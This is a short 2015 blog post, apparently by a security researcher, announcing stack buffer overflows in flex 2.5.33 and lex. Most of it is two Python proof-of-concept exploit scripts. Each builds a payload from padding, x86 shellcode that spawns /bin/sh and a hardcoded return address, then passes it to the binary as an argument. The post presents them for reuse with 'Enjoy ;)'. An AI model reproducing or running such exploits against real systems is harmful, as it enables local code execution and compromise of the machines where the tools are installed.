Tuesday 28 April 2015

[EN] Flex 2.5.33 (2) 0days

I was testing some old bugs in one old distro, and that's how I found sigsegv in flex (2.5.33).

Below is the proof of concept:



---
#!/usr/bin/env python
# -------------------------
# 0day poc for flex 2.5.33
#

from subprocess import call

flex = '/usr/bin/flex'
shellcode =  "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
shellcode += "\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
nops = "A"*2165
ret = "\xc0\xfb\xff\xbf"

payload = nops + shellcode + ret
call([flex,payload])

print 'Done\n\n'
---


Second one is pretty similar (this time for /usr/bin/lex binary):
---

#!/usr/bin/env python
# -------------------------
# 0day poc for lex 2.5.33
# 28.04.2015
#

from subprocess import call

lex = '/usr/bin/lex'
shellcode =  "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
shellcode += "\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
nops = "\x90"*2165
ret = "\x80\xfb\xff\xbf"

payload = nops + shellcode + ret
call([lex,payload])

print 'Done\n\n'
---


Enjoy ;)


o/

No comments:

Post a Comment

What do You think...?